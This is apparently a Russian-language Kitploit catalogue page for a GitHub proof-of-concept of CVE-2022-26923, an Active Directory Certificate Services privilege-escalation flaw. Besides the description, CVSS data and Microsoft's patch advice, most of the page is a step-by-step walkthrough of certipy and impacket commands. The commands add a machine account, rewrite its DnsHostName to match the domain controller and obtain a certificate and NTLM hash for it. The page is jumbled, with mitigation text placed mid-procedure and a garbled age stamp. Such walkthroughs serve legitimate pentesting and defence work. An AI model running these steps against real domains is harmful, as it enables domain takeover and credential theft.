Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-26923_AD-Certificate-Services — Уязвимость позволяла пользователю с низкими привилегиями повысить свои привилегии до администратора домена в среде Active Directory по умолчанию с установленной ролью сервера Active Directory Certificate Services (AD CS). | Kitploit
Инструменты/GitHubGitHub/ludovicpatho/cve-2022-26923_ad-certificate-services
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеАутентификация
GitHubludovicpatho/cve-2022-26923_ad-certificate-services

CVE-2022-26923_AD-Certificate-Services

Уязвимость позволяла пользователю с низкими привилегиями повысить свои привилегии до администратора домена в среде Active Directory по умолчанию с установленной ролью сервера Active Directory Certificate Services (AD CS).

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
41144 лет назадПроверено Kitploit

CVE-2022-26923 Службы сертификации AD

  • Дата публикации : 10/05/2022
  • Сложность атаки: Низкая
  • Требуемые привилегии: Низкие
  • Оценка CVSS : 8.1

Уязвимость позволяла пользователю с низкими привилегиями повышать свои привилегии до администратора домена в среде Active Directory по умолчанию с установленной серверной ролью служб сертификации Active Directory (AD CS).

Эксплойт был разработан Оливером Льяком (ly4k_) на Python и опубликован до, а не после выпуска рекомендаций. Он заявлен как proof-of-concept. Эксплойт доступен для загрузки на research.ifcr.dk.

Источник :

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
  • https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
  • https://vuldb.com/fr/?id.199368

Описание

Недавно раскрытая ошибка повышения привилегий в Active Directory Domain ещё не использовалась в реальных атаках, однако её высокий показатель CVSS 8.8 указывает на высокий риск, который она представляет для скомпрометированных систем, позволяя злоумышленникам злоупотреблять сертификатами. CVE-2022–26923 позволяет манипулировать атрибутом DnsHostName, который задаёт имя компьютера в том виде, в котором оно зарегистрировано в DNS, и затем даёт противнику возможность получить сертификат от служб сертификации Active Directory (AD CS), что потенциально приводит к повышению привилегий.

PoC

root@kitploit:~
    - Username: user_test
    - Password: Password123#
    - Domain: my.domain.com
    
    To reproduce you must: 
    - Have impacket and certipy installed on the attacking machine.
      - https://github.com/SecureAuthCorp/impacket
      - https://github.com/ly4k/Certipy
    - Have compromised a user with low privilege. 
    - A system is vulnerable only if Active Directory Certificate Services is running on the domain.
  1. Начнём с генерации сертификата для нашего пользователя AD с низкими привилегиями (Username=user_test Password=Password123#) с использованием шаблона сертификата User:

    root@kitploit:~
    certipy req 'my.domain.com/user_test:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template User
    
  2. Проверим, что сертификат действителен и может использоваться для аутентификации Kerberos через Certipy:

    root@kitploit:~
    certipy auth -pfx user_test.pfx
    
  3. Добавление виртуального компьютера в домен с помощью Impacket

    root@kitploit:~
    addcomputer.py 'my.domain.com/user_test:Password123#' -method LDAPS -computer-name 'NEW_PC' -computer-pass 'Password123#'
    
    # my.domain.com/user_test:Password123# - We need to provide valid AD credentials in order to add a new computer.
    # method - The method of authentication. LDAPS will interface with the LDAP service on the domain controller.
    # computer-name - The name of our computer. This can be anything we like, as long as it is not the same as an existing computer object.
    # computer-pass - The password associated with our computer's machine account. We will need to impersonate this computer that we create, so make note of the password you chose here.
    
  4. Сгенерируем сертификат для созданного нами нового компьютера. Чтобы использовать учётную запись компьютера, необходимо добавить «$» в конец имени:

    root@kitploit:~
    certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
    

Меры по смягчению и исправлению

Для смягчения последствий CVE-2022–26923 и принятия защитных мер корпорация Microsoft настоятельно рекомендует обновить все серверы, на которых работают службы сертификации Active Directory (AD CS), а также контроллеры домена Windows, использующие сертификатную аутентификацию, до последней версии от 10 мая.

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
Скачать инструмент
  • На скомпрометированной машине обновляем атрибуты DNS Hostname и SPN:

    root@kitploit:~
    PS C:\Users\user_test> Get-ADComputer NEW_PC -properties dnshostname,serviceprincipalname
    
  • Удаляем текущий атрибут SPN

    root@kitploit:~
    PS C:\Users\user_test> Set-ADComputer NEW_PC -ServicePrincipalName @{}
    
  • Попробуем установить атрибут DNS hostname как у контроллера домена:

    root@kitploit:~
    PS C:\Users\user_test> Set-ADComputer NEW_PC -DnsHostName HOSTANME.my.domain.com
    
  • На атакующей машине формируем вредоносный сертификат

    root@kitploit:~
    certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
    
  • Проверяем, что сертификат работает и вернёт хэш NTLM

    root@kitploit:~
    certipy auth -pfx hostname.pfx